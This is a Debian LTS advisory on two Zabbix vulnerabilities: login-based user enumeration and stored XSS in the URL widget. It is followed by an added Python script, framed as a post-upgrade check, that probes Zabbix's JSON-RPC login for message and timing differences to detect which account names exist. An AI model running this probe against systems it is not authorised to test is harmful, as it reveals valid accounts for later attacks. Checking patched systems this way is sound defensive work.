-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

From: Sylvain Beucler <[email protected]>
To: [email protected]
Subject: [SECURITY] [DLA 2631-1] zabbix security update
- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2631-1                [email protected]
https://www.debian.org/lts/security/
April 21, 2021                                https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : zabbix
Version        : 1:3.0.32+dfsg-0+deb9u1
CVE ID         : CVE-2019-15132 CVE-2020-15803
Debian Bug     : 935027 966146

Multiple vulnerabilities were discovered in Zabbix, a network monitoring
solution. An attacker may enumerate valid users and redirect to external
links through the zabbix web frontend.

CVE-2019-15132

    Zabbix allows User Enumeration. With login requests, it is possible
    to enumerate application usernames based on the variability of
    server responses (e.g., the "Login name or password is incorrect"
    and "No permissions for system access" messages, or just blocking
    for a number of seconds). This affects both api_jsonrpc.php and
    index.php.

CVE-2020-15803

    Zabbix allows stored XSS in the URL Widget.
    This fix was mistakenly dropped in previous upload
    1:3.0.31+dfsg-0+deb9u1.

This update also includes several other bug fixes and improvements.
For more information please refer to the upstream changelog file.

For Debian 9 stretch, these problems have been fixed in version
1:3.0.32+dfsg-0+deb9u1.

We recommend that you upgrade your zabbix packages.
For the detailed security status of zabbix please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/zabbix

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE1vEOfV7HXWKqBieIDTl9HeUlXjAFAmCAOTwACgkQDTl9HeUl
XjBBmRAAoeaXBWcAby5VexUL5aDbq7tF0yKtyxkT0GX0xLhSvsv3BY0RNGeifMML
eRanx9I4t4kz1M+lQWwQObXLtMcptKx2O0AkEG+7JnyaEvKG/qZD9cfwdDtKrj0b
SQMDfeM49LJzkmE2rRUO+AbYoCewNo37ydgUGE06UE+2kXGHfirrospTW2I/i3yS
in7lUNCd4GcX6GZEMKSTSGfTxpq5szoIIU61jOZtGm1NSalBiA7SGIxQ0zGESJ0H
/3avQqaqIr0DZ6LfUCBICEBq5SF/YzI7tsvfKrk/sSwbU3rJL1hOA8MHb5iRcPft
HnIwIU1gTyZCxupGEGBJJ7FrJUlUw0p9FEaxLxwryqdUsCUa5fzYngw7EnW8kij6
UiZedOTMwx6LAUUVLr75y1mhyD4eIWdlIuB3WsiOaiC4ZyvOTEJ+cGpfmw6e8Pwx
Mn01u8cRg3d5wlBAlUK35XT3uplijY2tg3/JEPWPz5QKuapG14N4WEzOopG2LAg6
WdiT4rV9B9rJfX9dOKyv1BJbO+K9nEQYBDQTe4u3tMPpn+uMHsXhdl6m8dQfXjOg
Emv3DPx8zyhwpvbtPmtCFaM7dIKpOVipnJ4+hHecK1FZKYAxaMJwFkfkIXtmjWks
yvF8xFvcWdc+xdtZZIoFY8ofkq9OM/B5n1Qf68ShnJXrdegdIjk=
=X+nD
-----END PGP SIGNATURE-----
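The CVE-2019-15132 oracle described in the advisory (different error messages, or a multi-second block, depending on whether the login name exists) can be turned into a small post-upgrade check: send user.login requests for a random, certainly-nonexistent name and for each candidate account, and see whether any side channel separates them. The following is an added example, not part of the Debian advisory or of Zabbix. It assumes the pre-5.4 JSON-RPC parameter names ("user"/"password") used by the 3.0 frontend at api_jsonrpc.php, treats a latency gap of one second or more as a timing leak (an assumed threshold), and ships with constructed sample observations so it runs offline; the probe() function talks to a live endpoint and is only for systems you are authorised to test.

```python
"""Check whether a Zabbix frontend's user.login leaks account existence
(CVE-2019-15132 style message/timing oracle). Added example; the endpoint
parameter names and the timing threshold are assumptions."""
import json
import time
import urllib.error
import urllib.request
from dataclasses import dataclass

# Error strings quoted in the advisory; a vulnerable frontend returns a
# different one depending on whether the login name exists.
GENERIC_ERROR = "Login name or password is incorrect."
NO_PERMISSION_ERROR = "No permissions for system access."

# Latency gap treated as a side channel (assumption: the throttling in the
# vulnerable versions blocks for whole seconds, so 1 s is a conservative cut).
SLOW_THRESHOLD = 1.0


@dataclass
class LoginObservation:
    user: str
    error_text: str   # "" if the login unexpectedly succeeded
    elapsed: float    # seconds the server took to answer


def login_error_text(body: bytes) -> str:
    """Pull the user-visible error out of a JSON-RPC reply body."""
    reply = json.loads(body)
    err = reply.get("error")
    if not err:
        return ""
    parts = [err.get("message", ""), err.get("data", "")]
    return " ".join(p for p in parts if p).strip()


def probe(api_url: str, user: str, password: str = "not-the-password") -> LoginObservation:
    """Send one user.login request and record the error text and latency.

    Assumes the 3.0-era parameter names "user"/"password" (hypothetical here).
    """
    payload = {"jsonrpc": "2.0", "method": "user.login", "id": 1,
               "params": {"user": user, "password": password}}
    req = urllib.request.Request(api_url, data=json.dumps(payload).encode(),
                                 headers={"Content-Type": "application/json-rpc"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            body = resp.read()
    except urllib.error.HTTPError as e:  # JSON-RPC errors may come with 4xx/5xx
        body = e.read()
    return LoginObservation(user, login_error_text(body), time.monotonic() - start)


def distinguishing_channels(baseline: LoginObservation, candidate: LoginObservation,
                            slow_threshold: float = SLOW_THRESHOLD) -> list:
    """Which side channels separate `candidate` from the nonexistent-user baseline."""
    channels = []
    if candidate.error_text != baseline.error_text:
        channels.append("message")
    if candidate.elapsed - baseline.elapsed >= slow_threshold:
        channels.append("timing")
    return channels


def flag_existing_users(baseline: LoginObservation, candidates: list,
                        slow_threshold: float = SLOW_THRESHOLD) -> dict:
    """Return {user: channels} for every candidate that looks like a real account.
    An empty dict means the frontend answered uniformly (expected after the fix)."""
    flagged = {}
    for cand in candidates:
        channels = distinguishing_channels(baseline, cand, slow_threshold)
        if channels:
            flagged[cand.user] = channels
    return flagged


# Constructed sample observations (not real captures): what a vulnerable
# 3.0.x frontend might return for a random name versus three candidates.
BASELINE = LoginObservation("zz-no-such-user-7f3a", GENERIC_ERROR, 0.12)
CANDIDATES = [
    LoginObservation("Admin", GENERIC_ERROR, 3.15),        # same text, but blocked for seconds
    LoginObservation("guest", NO_PERMISSION_ERROR, 0.11),  # different message
    LoginObservation("alice", GENERIC_ERROR, 0.13),        # indistinguishable from baseline
]


def demo() -> dict:
    """Run the oracle over the constructed sample."""
    return flag_existing_users(BASELINE, CANDIDATES)


if __name__ == "__main__":
    for user, channels in demo().items():
        print(f"{user}: distinguishable via {', '.join(channels)}")
```

Against a live 3.0 frontend, replace the constructed observations with `probe("https://host/zabbix/api_jsonrpc.php", name)` for a random name and each candidate, repeating a few times to average out network jitter; after the fixed package is installed, the expected result is an empty dict, since every failed login should yield the same message and comparable latency.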
